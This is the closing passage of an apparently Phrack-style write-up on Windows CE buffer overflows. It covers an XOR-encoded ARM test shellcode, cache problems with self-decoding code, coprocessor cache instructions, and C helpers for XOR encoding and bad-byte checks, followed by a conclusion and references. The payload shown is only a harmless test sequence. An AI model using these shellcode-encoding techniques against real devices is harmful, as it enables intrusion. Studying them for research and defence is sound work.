    0xE1A01001,
    0xE1A01001,
    0xE1A01001,
    0xE1A01001,

    0x6B28C889, // mov r4, #0x1 ; encoded
    0x6B28B889, // mov r3, #0x1
    0x6B28A889, // mov r2, #0x1
    0x6B289889, // mov r1, #0x1
    0xE6000010, // breakpoint

The four mov instructions are encoded by XOR with 0x88. The decoder loops
over the encoded bytes: it loads each byte, XORs it with 0x88 and stores
it back to its original position. The r1-r4 registers don't get 0x1 even
if you put a lot of pad instructions after the decoder, on both arm9 and
arm10 processors. I think the load instruction may cause a cache problem.

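The encoding side of this scheme runs on the attacker's host. Below is a
minimal C sketch under my own naming (xor_bytes, contains_byte): it
XOR-encodes a byte buffer with a single-byte key and checks whether a
forbidden byte, such as the zero that stops strcpy, is still present.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* XOR every byte of buf with key; applying it twice restores the input. */
void xor_bytes(unsigned char *buf, size_t len, unsigned char key)
{
    size_t i;

    assert(buf != 0);
    for (i = 0; i < len; i++)
        buf[i] ^= key;
}

/* Returns 1 if any byte of buf equals bad (for example 0x00 for strcpy). */
int contains_byte(const unsigned char *buf, size_t len, unsigned char bad)
{
    size_t i;

    for (i = 0; i < len; i++)
        if (buf[i] == bad)
            return 1;
    return 0;
}
```

Encoding the little-endian bytes of 0xE3A04001 (mov r4, #0x1) with key
0x88 gives 0x6B28C889, the first encoded word in the listing. Note that a
payload byte equal to the key itself becomes zero after encoding, so the
key has to be chosen with the payload in mind.
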
The ARM Architecture Reference Manual has a chapter on how to deal with
self-modifying code. It says the caches are to be flushed by an operating
system call. Phil, the guy from 0dd, shared his experience with me. He
said he has used this method successfully on an ARM system (I think his
environment may be Linux). Well, this method also works on AIX PowerPC
and Solaris SPARC (I've tested it). But SWI is implemented in a different
way under Windows CE. armtrap.s contains the implementation of SWIHandler,
which does nothing except 'movs pc,lr'. So the SWI has no effect after the
decoding has finished.

Because Pocket PC applications run in kernel mode, we have the privilege
to access the system control coprocessor. The ARM Architecture Reference
Manual describes the memory system and how to handle the caches via the
system control coprocessor. After looking into this manual, I tried to
disable the instruction cache before decoding:

    mrc     p15, 0, r1, c1, c0, 0
    bic     r1, r1, #0x1000
    mcr     p15, 0, r1, c1, c0, 0

But the system froze when the mcr instruction executed. Then I tried to
invalidate the entire instruction cache after decoding:

    eor     r1, r1, r1
    mcr     p15, 0, r1, c7, c5, 0

But it had no effect either.

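To place such coprocessor instructions into a hex array like the ones
above, their opcodes have to be assembled by hand or by a small helper.
The sketch below follows the MCR/MRC bit layout of the ARM Architecture
Reference Manual for the always (AL) condition; cp_transfer is a name I
made up.

```c
#include <assert.h>
#include <stdint.h>

/*
 * Encode an unconditional (AL) coprocessor register transfer:
 *   MCR/MRC p<cp>, <opc1>, r<rd>, c<crn>, c<crm>, <opc2>
 * to_arm = 1 gives MRC (coprocessor -> ARM register), 0 gives MCR.
 * cp_transfer is an illustrative helper name, not an existing API.
 */
uint32_t cp_transfer(int to_arm, unsigned cp, unsigned opc1, unsigned rd,
                     unsigned crn, unsigned crm, unsigned opc2)
{
    assert(cp < 16 && opc1 < 8 && rd < 16);
    assert(crn < 16 && crm < 16 && opc2 < 8);
    return 0xEE000010u
         | ((uint32_t)opc1 << 21)
         | ((uint32_t)(to_arm ? 1u : 0u) << 20)
         | ((uint32_t)crn << 16)
         | ((uint32_t)rd << 12)
         | ((uint32_t)cp << 8)
         | ((uint32_t)opc2 << 5)
         | (uint32_t)crm;
}
```

cp_transfer(0, 15, 0, 1, 7, 5, 0) gives 0xEE071F15, the encoding of
"mcr p15, 0, r1, c7, c5, 0", and the "mrc p15, 0, r1, c1, c0, 0" that
reads the control register comes out as 0xEE111F10.
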

--[ 11 - Conclusion

The code discussed above is a real-life buffer overflow example on
Windows CE. It is not perfect, but I think this technique will be improved
in the future.

Because of the cache mechanism, the decoding shellcode is not good enough
yet.

The Internet and handheld devices are growing quickly, so threats to PDAs
and mobiles are becoming more and more serious. And patching Windows CE is
more difficult and dangerous for customers than patching a normal Windows
system. Because the entire Windows CE system is stored in ROM, you must
flash the ROM to patch system flaws, and the ROM images of different
vendors or models of PDAs and mobiles aren't compatible.


--[ 12 - Greetings

Special greets to the dudes of XFocus Team, and to my girlfriend: life
would fade without you.
Special thanks to the Research Department of NSFocus Corporation; I love
this team.
And I'd like to show my appreciation to the 0dd members, Nasiry and Flier
too; the discussions with them were nice.


--[ 13 - References

[1] ARM Architecture Reference Manual
    http://www.arm.com
[2] Windows CE 4.2 Source Code
    http://msdn.microsoft.com/embedded/windowsce/default.aspx
[3] Details Emerge on the First Windows Mobile Virus
    - Cyrus Peikari, Seth Fogie, Ratter/29A
    http://www.informit.com/articles/article.asp?p=337071
[4] Pocket PC Abuse - Seth Fogie
    http://www.blackhat.com/presentations/bh-usa-04/bh-us-04-fogie/bh-us-04-fogie-up.pdf
[5] misc notes on the xda and windows ce
    http://www.xs4all.nl/~itsme/projects/xda/
[6] Introduction to Windows CE
    http://www.cs-ipv6.lancs.ac.uk/acsp/WinCE/Slides/
[7] Nasiry's way
    http://www.cnblogs.com/nasiry/
[8] Programming Windows CE Second Edition - Doug Boling
[9] Win32 Assembly Components
    http://LSD-PL.NET

|=[ EOF ]=--------------------------------------------------------------=|